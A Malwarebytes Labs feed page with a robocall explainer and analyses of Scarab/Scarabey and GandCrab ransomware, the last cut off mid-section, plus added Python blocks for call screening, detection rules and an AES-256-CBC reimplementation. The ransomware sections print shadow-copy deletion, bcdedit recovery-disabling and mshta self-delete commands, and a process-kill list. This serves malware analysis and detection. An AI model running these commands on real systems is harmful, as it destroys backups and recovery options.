Techie Feeds

Stop telephoning me-eh-eh-eh-eh: robocalls explained

Malwarebytes - Thu, 02/01/2018 - 19:11

If you’ve ever answered a call from a number outside your contact list only to hear a recorded message playing back at you, you have just been robocalled. Unfortunately for American consumers, this happens several times a day, seven days a week. Suffice it to say, this is beyond annoying, and it’s getting worse.

In their National Robocall Index, YouMail, a telecommunications service provider, revealed that nearly 10 billion robocalls were made by mid-2016 and predicted a total of 30 billion by the end of that year. Furthermore, YouMail announced that American consumers received a total of 30.5 billion robocalls in 2017.

Are robocalls the same as cold calls?

What spam is to email, robocalls are to telephony: home phones, mobile phones, and VoIP lines. There is usually no live human behind a robocall, only an automated, pre-recorded message; as the name suggests, the calls are placed by computers. Cold calls, warm calls, social calls, and the more personalized and targeted form of cold calling that salespeople refer to as “smart calls,” on the other hand, all require a live person.

Many types of robocalls are legal, just as emails, SMS/MMS messages, and ordinary phone calls are. Unfortunately, like those channels, they can be abused. So how can you tell the good from the bad?

Which are the “good” robocalls?

One example of legitimate robocalls comes from political parties, especially during election season. Their goal is to sway voters to their side or to solicit donations. Such calls are permitted under FCC rules.

Other examples include robocalls that notify users of canceled flights or airline changes; doctor or dental appointment reminders; class cancellations or school emergencies; and credit card fraud alerts, among others. Robocalls that are made on behalf of non-profit organizations and charities exist as well. But take note: although several of these types are legal, most robocalls are illegal and fraudulent in nature.

Which are the bad robocalls?

Illegal robocalls generally contact recipients with the intention of stealing something from them. And that something might be your contact number, your financial information, or even your identity.

Here’s a rule of thumb: if you didn’t consent to the call and it carries no emergency or critical information, the robocall can be considered illegal.

Take note of the list of purported sources of robocalls below. Robocalls that claim to come from these organizations certainly do not. You can be sure that they’re always, always a scam:

  • IRS
  • Social Security Administration (SSA)
  • Department of Motor Vehicles (DMV)
  • Cruise companies
  • Tech support

A newer trend in illegal robocalling is the use of numbers that closely resemble the recipient’s own. Ailsa Chang, a correspondent for NPR’s Planet Money podcast, documented her experience with this when she received a call from a number with the same area code and the same exchange (the three digits after the area code) as her own number. This is known as neighbor spoofing.

The psychology behind neighbor spoofing is that recipients are more likely to pick up the call should they see a familiar-looking number because they believe the caller might be someone they know, like a colleague or their child’s school.
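As an added illustration (not part of the Malwarebytes post), here is a small screening rule in Python for the neighbor-spoofing pattern: a caller is treated as a “neighbor” when its area code and exchange (NPA-NXX) match the subscriber’s own number but it is not a saved contact. The subscriber number, contact list, and call log below are constructed inputs.

```python
import re

# North American Numbering Plan: optional country code 1, then NPA, NXX, line.
NANP = re.compile(r"^1?(\d{3})(\d{3})(\d{4})$")


def normalize(number):
    """Reduce a formatted number to (NPA, NXX, line), or None if it does not parse
    (withheld / 'Anonymous' caller ID ends up here)."""
    digits = re.sub(r"\D", "", number)
    m = NANP.match(digits)
    return m.groups() if m else None


def classify_call(caller, own_number, contacts):
    """'contact' for a saved number, 'neighbor-spoof' when the caller shares the
    subscriber's NPA-NXX but is not a contact and not the subscriber's own number,
    otherwise 'unknown'."""
    c = normalize(caller)
    if c is None:
        return "unknown"
    if c in {normalize(n) for n in contacts}:
        return "contact"
    own = normalize(own_number)
    if own and c != own and c[:2] == own[:2]:
        return "neighbor-spoof"
    return "unknown"


def screen_log(call_log, own_number, contacts):
    """Classify every call and count the distinct neighbor-like numbers seen.
    One such call may be a real neighbor; several distinct ones in a short
    window is the signature of a spoofing campaign."""
    verdicts = [(caller, classify_call(caller, own_number, contacts))
                for _, caller in call_log]
    neighbors = {normalize(n) for n, v in verdicts if v == "neighbor-spoof"}
    return verdicts, len(neighbors)


# Constructed sample data; 555-01xx numbers are reserved for fiction.
OWN = "(202) 555-0142"
CONTACTS = ["202-555-0199", "+1 415 555 0100"]
CALL_LOG = [
    ("09:02", "202-555-0199"),    # saved contact
    ("09:15", "(202) 555-0107"),  # same NPA-NXX as OWN, not a contact
    ("09:16", "2025550188"),      # same NPA-NXX again, different line
    ("10:40", "800-555-0123"),    # unrelated toll-free number
    ("11:05", "Anonymous"),       # withheld caller ID
]

if __name__ == "__main__":
    verdicts, distinct_neighbors = screen_log(CALL_LOG, OWN, CONTACTS)
    for (when, _), (caller, verdict) in zip(CALL_LOG, verdicts):
        print(when, caller, "->", verdict)
    print("distinct neighbor-like callers:", distinct_neighbors)
```

The rule reports a count rather than blocking outright, because a single call from your own exchange can be legitimate; the advice above (let unknown callers go to voicemail) still applies to every non-contact verdict.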

In this underground, lucrative business, scammers have become more creative, thanks to technology that has made it easier for them to make unwanted calls and more challenging for us to accurately detect and block.


I just enrolled in the National Do Not Call Registry. I shouldn’t be getting those deceptive robocalls now, right?

While it is true that legitimate businesses making robocalls honor the National Do Not Call Registry, your average cybercriminal and scammer does not. Being on the registry does not make your number immune to illegal robocalls.

Back in 2003, when the registry was established, it was effective at deterring legitimate businesses from making unwanted calls. But things have changed significantly since then. For one thing, the Internet has grown, and the resources needed to make vast numbers of cheap calls are easy to come by. Furthermore, the majority of these illegal robocalls are known to originate outside the United States, making them difficult (if not impossible) to stop.

I’ve seen YouTube clips of people messing with phone scammers. Can I do that with these robocallers?

We don’t advise it. In fact, both the Better Business Bureau (BBB) and the FCC strongly encourage phone users never to answer calls from numbers that are not in their contact list, from anonymous callers, or from numbers they don’t recognize. Doing otherwise can only make matters worse, as robocallers may flag your number as active: for them, any response from a number is a sure sign that it’s live, and a live number will be targeted again and again. Ignoring such calls is the less thrilling but best course of action.

So what else can we do to mitigate bad robocalls once and for all?

Below are steps one can take to nip robocalling in the bud:

  • Report the call to the FCC, Federal Trade Commission (FTC), and your attorney general. Doing so will help the collective efforts of regulators and phone companies in blocking these numbers.
  • Do not give out your number online or post it publicly in your social media profiles. They will likely be scraped by scammers.
  • Use call-screening apps that analyze the kind of call you receive so you can respond accordingly. Nomorobo is one of the best on the market; it won the FTC’s Robocall Challenge several years ago. Other useful apps include Truecaller, YouMail, PrivacyStar, Hiya, and Mr. Number.
  • Go old-school by turning off your landline’s ringer and then feeding the call to an answering machine with a caller ID. You can always return the call if you have determined that the caller is using a legitimate number or has actually left a message worth returning.
  • If you do pick up a call from a robocaller, whether by accident or just for the heck of it, hang up immediately and don’t answer any question put to you. It’s likely that your voice is being recorded so it can be used to authorize charges on stolen credit cards.
  • Take advantage of any added security measures or protocols your voice service provider offers. Late last year, the FCC passed a rule that gives phone companies the power to proactively block calls from numbers that do not or cannot make outgoing calls.

At this time, there’s no one solution for the complicated problem of nasty robocalls; however, consumers can pay it forward, helping those who are less in the know to stave off robocallers who’d like to rob them blind.

The next time you receive an unwanted call, don’t just flare up. Shut them up for good.

The post Stop telephoning me-eh-eh-eh-eh: robocalls explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Scarab ransomware: new variant changes tactics

Malwarebytes - Wed, 01/31/2018 - 22:28

The Scarab ransomware was discovered in June 2017. Since then, several variants have been created and found in the wild. The most widespread versions were distributed via the Necurs botnet and were compiled from Visual C. However, after unpacking, we found that another variant, discovered in December 2017 and called Scarabey, is distributed a little differently and carries a different payload as well.

Scarabey, like most ransomware, is designed to demand a Bitcoin payment from its victims after encrypting files on their systems. However, instead of being distributed via Necurs malspam like the original Scarab, Scarabey was found targeting Russian users and being distributed via RDP/manual dropping on servers and systems.

In addition, Scarabey does not appear to be packed in any of the samples we have come across. The malicious code is written in Delphi and lacks the C++ packer that Scarab uses, and the content and language of the ransom notes differ between the two.

Samples referenced:
Scarab original: e8806738a575a6639e7c9aac882374ae
Scarabey variant: 9a02862ac95345359dfc3dcc93e3c10e

The ransom notes

As far as the victim is concerned, the main difference between Scarabey and other Scarab ransomware is the language of the ransom note and the scare tactic used in the encryption message.

In the Scarab sample, the ransom note is written in English, however, it reads as if you translated word-for-word a Russian text into English, without knowing proper English grammar or syntax. Scarabey, on the other hand, is written in Russian. What’s interesting is that when you throw the Scarabey note into Google translate, as I have done below, it contains the same grammatical errors as the Scarab note.

Original Scarab message

Scarabey message, translated from Russian to English with Google translate

This is more evidence that the authors of Scarab are likely Russian speakers who wrote the note in their native language and ran it through a translator before adding it to the Scarab code. It then seems quite likely that, having decided to target Russians, they released the Scarabey note in their native language to reach more victims.

Different threats

In the original Scarab versions, it warns: The longer the user waits, the more the price will go up.

For Scarabey, on the other hand, it tells users that for every day they wait, more and more files will be deleted, until there are no more files left for them to recover.

Essentially, the criminals are implying that they have copies of the unencrypted files to give back to the user, or that they have control of the victim computer to delete files. This is not true for a few reasons:

  1. Besides the fact that the volume of data required to upload every file on the victim’s computer is completely unreasonable, there is no network functionality for sending files to the malware authors to hold for ransom.
  2. There is no backdoor or remote access code in Scarab or its variants, which makes the threat of deleting files on the victim’s computer impossible to carry out.
  3. The decryption process, as we understand it, is that they send you decryption software loaded with your unique key after the ransom is paid. You then run the software and decrypt your files. That being said, there is no way for them to limit what gets decrypted, as it is done locally and offline.
  4. Nowhere in the malware’s code is there any section that deletes the user’s files from the computer.

Specifically, in the message, you see the author implying that the files are held and decrypted server side, which is untrue:

“24 files are deleted every 24 hours. (we have copies of them)
If you do not run the decryption program within 72 hours, all the files on the computer are completely deleted, without the possibility of recovery.”

Then, the malware author gives the steps to decrypt, which reference the use of a decryption program sent to the victim after payment. A decryption software received after payment with your unique key will decrypt files locally:

“- After starting the decoder, the files are decoded within an hour.
– Decoders of other users are incompatible with your data, as each user
unique encryption key”

The conclusion here is that the deletion of files or the idea that the malware authors have access to delete files is purely a scare tactic used to urge users into sending money quickly.

Technical analysis

While comparing the code from Scarab to Scarabey, it became quite clear that this variant, although written in Russian and targeting Russian users, likely comes from the same authors of the original. Throughout the entire code, both variants of malware are almost byte-for-byte identical. In addition, the sub processes generated, the dropped files, the encryption method used, and the mutexes used are all identical between the original Scarab version and Scarabey. This is the reason we consider it a variant, rather than a new family.

The following image shows the output from the two malware variants. The only things that differ are the addresses of code and memory data references (highlighted in yellow and red).

Code analysis

The Scarabey variant is written in Delphi. First, it starts off by checking if it is the first time being run. It does this by checking if it has parameters passed in. If not, it checks to see if the following registry key has been set:


[First run check, registry key]

If not set (meaning it is the first time being run), it checks that sevnz.exe has not been created yet and executes cmd.exe to copy itself into the roaming AppData directory as sevnz.exe using:

cmd.exe /c copy /y C:\Users\virusLab\Desktop\9a02862ac95345359dfc3dcc93e3c10e.exe “C:\Users\virusLab\AppData\Roaming\sevnz.exe”

Then it spawns a process of itself with param ‘runas’ as it exits.

[verifies sevnz.exe does not exist, copies self to sevnz.exe, executes self with ‘runas’ param]

Now the sub process takes over.

The code flow now enters the same function as before, and deletes SEVNZ and re-copies it. It skips over those initial sections because of the parameter passed in. It then executes the previously copied file sevnz.exe:


Then, it opens the process cmd.exe with command line…

“mshta.exe “javascript:o=new ActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘9a02862ac95345359dfc3dcc93e3c10f.exe’);close()}catch(e){}},10);””

…which simply waits and then deletes the original executable, since a running process cannot delete its own image file.

Now onto the SEVNZ.exe process:

The process checks whether it is currently running as sevnz.exe by trying to delete sevnz.exe.

If the deletion fails, it knows that it is currently running as sevnz.exe rather than the original executable. Once it passes this check, it uses mshta.exe to execute JavaScript, which delays and then adds the malware to the registry auto-run:

mshta.exe “javascript:o=new ActiveXObject(‘WScript.Shell’);

Next, it proceeds to delete shadow volume copies, which is standard for ransomware to make sure users cannot restore encrypted files.

Executes these scripts with mshta.exe:
o=new ActiveXObject("WScript.Shell");
o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);
o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);
o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);
o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);
o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);
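The commands above are a good detection surface: administrators rarely run them together, and almost never as children of mshta.exe. The following Python is an added example (not from the Malwarebytes analysis) that applies a few process-creation rules to constructed Sysmon-style events modelled on these command lines and on the mshta self-delete seen earlier; the event records, the rule names, and the “two distinct categories from one parent” threshold are my assumptions.

```python
import re
from collections import defaultdict

# (rule name, pattern over the command line). Case-insensitive because the
# sample mixes "SHADOWCOPY DELETE" and "Delete Shadows".
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("backup_catalog_deletion",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+(systemstatebackup|catalog)", re.I)),
    ("recovery_disabled",
     re.compile(r"bcdedit(\.exe)?.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("mshta_inline_js",
     re.compile(r"mshta(\.exe)?\s+\"?javascript:", re.I)),
    ("mshta_self_delete",
     re.compile(r"Scripting\.FileSystemObject.*DeleteFile", re.I)),
]

# Constructed events modelled on the command lines in the analysis; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\AppData\Roaming\sevnz.exe",
     "cmdline": "mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');"
                "o.Run('cmd.exe /c vssadmin Delete Shadows /All /Quiet',0);\""},
    {"parent": "mshta.exe", "cmdline": "cmd.exe /c bcdedit /set {default} recoveryenabled No"},
    {"parent": "mshta.exe", "cmdline": "cmd.exe /c wmic SHADOWCOPY DELETE"},
    {"parent": "cmd.exe",   "cmdline": "vssadmin list shadows"},   # benign admin use
    {"parent": "dropper.exe",
     "cmdline": "mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');"
                "setInterval(function(){try{o.DeleteFile('dropper.exe');close()}catch(e){}},10);\""},
]


def match_rules(cmdline):
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """(event index, matched rule names) for each event that trips at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        names = match_rules(ev["cmdline"])
        if names:
            hits.append((i, names))
    return hits


def suspicious_parents(events, threshold=2):
    """Parents whose children tripped at least `threshold` distinct rules.
    A lone 'vssadmin delete shadows' can be an admin reclaiming disk space;
    several recovery-inhibiting commands from one parent is ransomware preparation."""
    by_parent = defaultdict(set)
    for i, names in scan(events):
        by_parent[events[i]["parent"]].update(names)
    return {p: s for p, s in by_parent.items() if len(s) >= threshold}


if __name__ == "__main__":
    for i, names in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], names)
    print(suspicious_parents(SAMPLE_EVENTS))
```

Note that the shadow-copy rule fires on event 0 even though the command is buried inside an mshta JavaScript argument, which is why matching on the full command line rather than on the image name matters here.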

It then opens a thread that loops forever and makes sure no “key” processes are running. If any are found, it kills those processes. The reason for this is possibly that these processes have a lock on some files that the ransomware would have otherwise wanted to encrypt. So by killing these processes, it frees the files for encryption. The key processes are from a string generated:


In the main loop of the encryption function, it performs constant checks throughout the code for a mutex, and if it exists, this is a sign to clean itself up and remove itself from the system:


The encryption loop can be called through many different sections in the code, but the section that runs initially and performs the majority of the encryptions is pictured below:

It recursively walks all folders and checks that each file’s extension is not .exe or .dll. If the file passes, it encrypts it and renames it with a .scarab extension.

[checking current file extension using POS(),  if exists as substr of “exe,dll”]

The encryption code does not directly use any crypto APIs. Instead, the AES code is embedded within the malware, as shown in the images above.

[section is the setup leading to the call to the main cryptor function]

Encryption algorithm

We have determined that the encryption algorithm is AES. A 4-byte value (0xDEFACE01) is prepended to the buffer before the actual file data that it reads. Because it is a fixed constant rather than a random value, it is more likely a marker (or a joke from the malware author) than a salt. The code then performs some data manipulation using generated bytes, which is likely the initialization vector used to add randomness.


The malware proceeds to run AES 256 on the data, via the AES_ALGO labeled function. We determined it’s AES 256 because of a few properties.

  1. It uses 16-byte blocks, which is standard for every variant of AES: it encrypts 16 bytes (128 bits) of the file at a time.
  2. What differentiates the versions of AES is the size of the keys and the number of encryption rounds. In this case, it uses 14 rounds, which is standard for AES 256, instead of 10, which is standard for AES 128.  The key size is also 256 bits (32 bytes or characters).
  3. The sub type CBC (cipher block chaining) is also being used. The main indicator for CBC here is that the previous cipher text is used to encrypt the next plain text block. In other words, the previous encrypted block is used as the initialization vector for the next block of data to encrypt.
[showing the flow for AES CBC, IV being used first, followed by previous cipher text being used as IV]

In this case, the IV bytes are being XORed against the plain text bytes as an initialization step to create more randomness in the results. As you can see from the next image, the output of AES is then copied into the variable that will be used at the beginning of the loop to initialize the next plain text block before performing AES on it. At this point, it should be clearly AES usage, despite not being called via crypto APIs.

[The image below shows where the previous cipher-text is used for initialization as the IV. NOTE: var_28 will contain the encrypted data]

Below are a few screenshots illustrating the algorithm. As you can see, the data is loaded into matrices. Then, a series of data operations is performed against some hard-coded data, together with the encryption key bytes. What you are seeing in the highlighted text is one set of operations (1 of 4) in a single round; four of these sets make up one encryption round, most plausibly one for each column of the 4x4 state matrix. And as stated earlier, 14 rounds are done in total.

The encoded encryption key is written in the registry ‘temp’ key:

If the key is found in the registry, it proceeds to the function that decodes the key from the registry into the raw encryption key. Otherwise, it jumps to new generate function.

This is interesting because it is the main key used to encrypt files. The format is similar to the key from the ransom note, but this one is longer, suggesting that the key given to the user as the ID is an encoded version of the key stored in the registry. Example of the dumped key:

[HKEY_CURRENT_USER\Software\ILRTISo] "temp"="VkIAAAAAAADpt9Q2lAzhCExfqjLoD3vSpluc678N56Zn8b7LVRxMi1ZsYk2HXD1e4s3tiefTmZJAc0vxPposvLzP0yaCh5+KRQm60U0EkzeB2NXetarabUFYgJxb8QRsygKaOqBriC4Bs4ajM24h=e2CsVNP9R3q==UXNmfRFGIsv7NR9BIxE35bdoFpTU8rMGQ14MeQcAii1iY7GpNoY3b4DOgfuKGo3qNC1MYKYdfpn0dbiow3f7ZQGClpwTZ0shFhkWk7aTA7TM1prtgJte7TWe=ERHg8GaFrZtVs9ylNTYPt5CmzHBdAIaXeKZvZnSSafbi83o9gLgAS1OxAb7LBtJpZAJDyBkuyJFR4dFbXztponIBKT1OjtTvTMy07+0B4jI3=K1QGuKSROjAdCF06TsjKWlvUw0iUHRGasz946H3Mnxu3GdCHrAp9Cd94bMo1x1PVdIi3bXSwobjgOlJgJPJC4Y6J4QIE=e45PDNzdK6aCY0uiQ0jOD=8lDWTp=+r+dbGJrJ12qn8CRnBwaFIpyNjDhzdMdTwyvExCmuOesOLms8S7TRoV1GcTyWJAQpSJYcR66H6CngM5GHopdpoTH4mWVOOYp5HFHTDAvMafomF2S6xEmUgXIcKpB7oNohO+Wx0cUmf95=+9uozHMBWE4kFhj+OOKw0I7w7HnwYfafhxsw0CmoOvorZztXk8whlh1d4U26z=aJ6JwH8wVBSszsRLQ+H4y3bRaeupq5Vo+smDfigjVVzCam4HoAdOKzN9MWiigl9Oi+4vTkSFFazc6HzyVaHg8luKGBJMhi2FNHTFO56RA"

Versus the key from the ransom note:

+4IAAAAAAADIGnmIHZL=FYRQCAN=AgKnzw+0uzFbXSR5AdFlfTrhWN9sifnho8LiX5=V8SbNVWyWWrdbTLipFEeeEv=9zLmnid8e UqlqKr2RUN=V7LdjoyNwjWMNbylRiGNAKWK6g9exeHhVfUrZ+9oRTq6Kp5eNe7kDdV7UMPVZ12=5pm9a+5lOMw==TNi2R2tUjFcK tTD3c9IZgJwOMgcOw3fRrmgaloh5cIV3V74DRy2segx13RDL4J6B+gJnfT2mxIZuBE1G5HcmuLHCoqQif2BamhfbMASCUEpOp7+Z G0jI=1PTmOhD3Yq4XjJWI4mc61AruRlaYqwPTUUbrsI0zTYX1mmM3Tvyso8bqDy4h5meyPYuXlgtRj06mtdrGZszb6ObsIT4Fz0O Ag=4HgI4VSHA=HAU5yCjZzIIkLhlWGvdAk

The key used to encrypt changes from file to file, meaning that two files with identical content will differ after encryption. Essentially, there is an initial key from which many sub-keys are derived. If a single encryption key were used for all files (as has been seen with other ransomware), you could capture memory at any point in the encryption process, save the key, and use it to decrypt all of the files on your hard drive. Unfortunately, because of this key cycling, decryption of Scarab’s files is likely impossible without the authors’ key.
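Two points from the analysis above are worth seeing in code: that AES embedded in a binary can be recognized by its constants even when no crypto API is called, and that per-file key cycling defeats the “dump one key from memory” recovery. The block below is an added example, not Scarab’s code. It builds the Rijndael S-box (the 256-byte table a FindCrypt-style scan looks for), implements AES-256-CBC in pure Python so the 14-round schedule and the ciphertext-as-next-IV chaining are explicit, and prepends the 0xDEFACE01 value as described. The marker’s byte order, the PKCS#7 padding, and the HMAC-based per-file key derivation are assumptions; Scarab’s real derivation is not known.

```python
import hashlib
import hmac
import struct


def rotl8(v, n):
    return ((v << n) | (v >> (8 - n))) & 0xFF


def make_sbox():
    """Rijndael S-box from the GF(2^8) inverse plus the affine map. An AES
    implementation compiled into a binary carries these 256 bytes as a table,
    which is what a FindCrypt-style scan looks for."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF         # q /= 3
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ rotl8(q, 1) ^ rotl8(q, 2) ^ rotl8(q, 3) ^ rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = make_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def find_aes_sbox(blob):
    """Offset of the S-box table inside a binary blob, or -1 if absent."""
    return blob.find(bytes(SBOX))


def xtime(b):
    b <<= 1
    return (b ^ 0x1B) & 0xFF if b & 0x100 else b


def expand_key(key):
    """FIPS-197 key schedule -> (round-key words, rounds). Nr = Nk + 6, so a
    32-byte key gives the 14 rounds counted in the analysis; a 16-byte key gives 10."""
    nk = len(key) // 4
    nr = nk + 6
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    for i in range(nk, 4 * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord + SubWord
            t[0] ^= RCON[i // nk - 1]
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]               # extra SubWord, AES-256 only
        w.append([a ^ b for a, b in zip(w[i - nk], t)])
    return w, nr


def add_round_key(s, w, rnd):
    return [s[i] ^ w[4 * rnd + i // 4][i % 4] for i in range(16)]


def mix_column(a):
    x = [xtime(v) for v in a]                      # 2*a in GF(2^8); 3*a = 2*a ^ a
    return [x[0] ^ x[1] ^ a[1] ^ a[2] ^ a[3],
            a[0] ^ x[1] ^ x[2] ^ a[2] ^ a[3],
            a[0] ^ a[1] ^ x[2] ^ x[3] ^ a[3],
            x[0] ^ a[0] ^ a[1] ^ a[2] ^ x[3]]


def encrypt_block(w, nr, block):
    """Encrypt one 16-byte block; the state is held column-major."""
    s = add_round_key(list(block), w, 0)
    for rnd in range(1, nr + 1):
        s = [SBOX[b] for b in s]                                         # SubBytes
        s = [s[i % 4 + 4 * ((i // 4 + i % 4) % 4)] for i in range(16)]  # ShiftRows
        if rnd != nr:                                                    # no MixColumns in last round
            s = [v for c in range(4) for v in mix_column(s[4 * c:4 * c + 4])]
        s = add_round_key(s, w, rnd)
    return bytes(s)


MARKER = struct.pack(">I", 0xDEFACE01)   # the prepended value; byte order assumed


def per_file_key(master_key, file_path):
    """Assumed stand-in for Scarab's sub-key derivation: HMAC-SHA256(master, path)."""
    return hmac.new(master_key, file_path.encode(), hashlib.sha256).digest()


def encrypt_file_bytes(key, iv, data):
    """AES-CBC over MARKER || data with PKCS#7 padding (padding scheme assumed).
    Each ciphertext block is XORed into the next plaintext block, i.e. it acts
    as that block's IV, which is the chaining the analysis observed."""
    w, nr = expand_key(key)
    buf = MARKER + data
    pad = 16 - len(buf) % 16
    buf += bytes([pad]) * pad
    out, prev = bytearray(), iv
    for off in range(0, len(buf), 16):
        prev = encrypt_block(w, nr, bytes(a ^ b for a, b in zip(buf[off:off + 16], prev)))
        out += prev
    return bytes(out)


if __name__ == "__main__":
    master, iv = bytes(range(32)), bytes(16)
    for path in ("docs\\a.txt", "docs\\b.txt"):
        ct = encrypt_file_bytes(per_file_key(master, path), iv, b"identical content")
        print(path, ct.hex())
```

Running it prints two different ciphertexts for identical content under keys derived from one master key, which is the property that makes a single memory-dumped key useless. The key schedule and block function are checked against the FIPS-197 AES-128 and AES-256 test vectors; the per-file AES key itself is what a memory dump would yield, so recovery would still need the master key or the derivation.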

After full disk encryption is complete, the ransomware proceeds to a call function that enumerates all network folders and drives. For example: VMWare shared folders, Terminal services, Network Drives. If any are found, it encrypts the files within those folder as well.

Once complete, it opens the encryption message via notepad.exe.


There have been a number of articles online stating that Scarabey has the ability to act as a backdoor, allowing remote access, and may gather sensitive data. From our analysis, we believe this to be untrue. We found no functionality beyond encrypting files on the user’s computer.

Additionally, there were rumors that Scarab was built from the open-source ransomware project on GitHub called HiddenTear. We have confirmed this to be untrue, both in our own research and with external researchers. It seems to be the industry consensus now that the claim was posted in error.

Malwarebytes for Windows detects this threat and its variant as: Ransom.Scarab.

The post Scarab ransomware: new variant changes tactics appeared first on Malwarebytes Labs.


GandCrab ransomware distributed by RIG and GrandSoft exploit kits

Malwarebytes - Tue, 01/30/2018 - 23:43

This post was authored by Vasilios Hioueras and Jérôme Segura

Late last week saw the appearance of a new ransomware called GandCrab. Surprisingly, it is distributed via two exploit kits: RIG EK and GrandSoft EK.

Why is this surprising? Other than Magnitude EK, which is known to consistently push the Magniber ransomware, other exploit kits have this year mostly dropped other payloads, such as Ramnit or SmokeLoader, typically followed by RATs and coin miners.

Despite a bit of a slowdown in ransomware growth towards the last quarter of 2017, it remains a tried and tested business that guarantees threat actors a substantial source of revenue.


GandCrab was first spotted on Jan 26 and later identified in exploit kit campaigns.

RIG exploit kit

The well-documented Seamless gate appears to have diversified of late, with distinct threads pushing specific payloads. While Seamless is notorious for having switched to Internationalized Domain Names (IDNs) containing Cyrillic characters, we have also discovered a standard domain name in a different malvertising chain. (Side note: that same chain is also used to redirect to the Magnitude exploit kit.)

We observed the same filtering done upstream, which will filter out known IPs, while the gav[0-9].php step is a more surefire way to get the redirection to RIG EK.

At the moment, only the gav4.php flow is used to spread this ransomware.

GrandSoft exploit kit

This exploit kit is an oldie, far less common, and was thought to have disappeared. Yet it too was discovered distributing GandCrab.

GrandSoft EK’s landing page is not obfuscated and appears to be using similar functions found in other exploit kits.

Ransom note

Interestingly, GandCrab does not demand payment in the popular Bitcoin currency but rather in a lesser-known cryptocurrency called Dash. This is another sign that threat actors are moving to currencies that offer more anonymity and may have lower transaction fees than BTC.

Technical analysis

After unpacking, the binary is pretty straightforward as far as analysis is concerned. There were no attempts to obfuscate data or code beyond the first layer of the packer. Everything from the exclusion file types to web request variables, URLs, the list of AVs, even the whole ransom message, is in plain text within the data section. On an initial look-through, you can deduce what some of the functionality might be just by looking at the strings of the binary.

The code flow stays relatively linear, so as far as reverse engineering is concerned, it can be analyzed quite accurately even statically in a disassembler. The code is divided into three main segments: initialization, network, and encryption.


After unpacking, GandCrab starts out with a few functions whose task is to set up information to be used later in the code. It queries information about the system such as:

  • username
  • keyboard type
  • computer name
  • presence of antivirus
  • processor type
  • IP
  • OS version
  • disk space
  • system language
  • active drives
  • locale
  • current Windows version
  • processor architecture

It specifically checks if the keyboard layout is Russian, writes out an integer representation for that result, and builds a string with all this info. Below is the code that is starting to write out the variable names to label the information gathered:

It then cycles through all letters of the alphabet querying if a drive exists and what type it is. If it is a CDRom, unknown, or non existent, it skips it. If a fixed drive is found, it copies its name to a buffer and copies a string describing what type of drive it is. For example, the C: drive is FIXED.

It then gets disk free space and information on sectors that it converts into another series of numbers via printf function tokens: C:FIXED_64317550592. It continues this for every drive and builds a list.

It puts all of the information gathered on the system together and you can assume, before you even get to this point in the code, that this will be sent up to a C2 server at some point, as it is in the format of a GET request. Here is an example of how the system info gets structured below:


It also searches running processes, checking against a finite set of antivirus programs that will also be converted to the info string for the C2 server.

It then proceeds to create a mutex with some system info along with a generated ID. For example:


In order to initialize itself for the future encryption, it cycles through a hardcoded list of processes to kill. This is a common technique among ransomware that attempts to kill processes that might have a lock on certain files, which it would like to encrypt.

msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe,
mydesktopqos.exe, agntsvc.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe,
encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe,
excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe,
thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe

Next, it calls the built-in crypto functions to generate keys. GandCrab generates the public and private keys on the client side using the standard Microsoft CryptoAPI exported by Advapi32.dll: it calls CryptGenKey with the RSA algorithm.

Network connection

Now it enters the main loop for the Internet functionality portion of the ransomware. This area of code either succeeds and continues to the encryption section of code, or it loops again and again attempting to succeed. If it never succeeds, it will never encrypt any file.

This section starts off with a GET request whose response, the client’s external IP address, is saved and appended to the GET request string built from the system information.

It continues and takes a binary chunk, which is the RSA public key that was stored earlier in the initialization. That key is converted to base64 via the CryptBinaryToStringA API with the following parameters:


It is tacked onto the existing GET string, which it has been building all along. Below is an example of the generated RSA key in binary and its base64 conversion, followed by the finalized GET string with the base64 of the keys in it:

This is an example of an RSA public key generated with the crypto APIs:

Which gets converted to:


And builds the GET string to send to the C2 with all the system information from earlier, and also the encryption keys:

